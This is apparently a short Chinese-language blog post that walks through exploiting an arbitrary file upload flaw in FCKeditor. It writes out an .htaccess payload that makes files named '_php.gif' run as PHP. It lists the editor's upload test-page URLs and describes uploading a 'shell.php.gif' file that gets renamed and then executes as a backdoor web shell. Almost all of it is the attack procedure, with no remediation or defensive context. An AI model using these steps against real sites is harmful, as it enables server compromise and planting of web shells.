fckeditor任意檔案上傳漏洞
阿新 • • 發佈:2019-01-03
1. 建立.htaccess檔案,內容如下:
<FilesMatch
"_php.gif">
SetHandler
application/x-httpd-php
</FilesMatch>
.htaccess檔案可以用來設定某個目錄和某個目錄的子目錄的許可權,以上內容的意思是將副檔名是"_php.gif"的檔案解析成php
2.使用如下url,上傳上面建立的的.htaccess檔案
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
3.上傳shell.php.gif檔案 這一步還是使用如下url:
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
shell.php.gif檔案被上傳後,自動更名為shell_php.gif,shell_php.gif檔案就是後門檔案
4.訪問shell_php.gif,則可以,shell執行